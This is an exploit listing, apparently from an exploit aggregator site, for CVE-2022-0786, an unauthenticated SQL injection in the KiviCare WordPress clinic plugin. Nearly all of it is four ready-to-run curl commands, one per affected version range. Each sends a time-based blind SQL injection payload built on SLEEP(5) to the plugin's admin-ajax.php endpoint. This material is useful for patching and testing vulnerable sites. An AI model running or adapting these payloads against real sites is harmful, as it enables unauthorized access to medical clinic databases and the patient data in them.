Exploit for KiviCare < 2.3.9 - Unauthenticated SQLi CVE-2022-0786

Name: Exploit for KiviCare < 2.3.9 - Unauthenticated SQLi CVE-2022-0786
Rating: 5 (87 reviews)

2022-05-23 | CVSS 7.5

## https://sploitus.com/exploit?id=WPEX-ID:53F493E9-273B-4349-8A59-F2207E8F8F30
With at least one doctor created via the plugin:

v < 2.3.4
curl 'https://example.com/wp-admin/admin-ajax.php?action=ajax_post&route_name=get_doctor_details&clinic_id%5bid%5d=(CASE+WHEN+(4=4)+THEN+SLEEP(5)+ELSE+5+END)' --data ''

v < 2.3.5
curl 'https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"(CASE+WHEN+(4=4)+THEN+SLEEP(5)+ELSE+5+END)"%7D'

v < 2.3.6
curl 'https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)"%7D'

v <= 2.3.8
curl 'http://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b'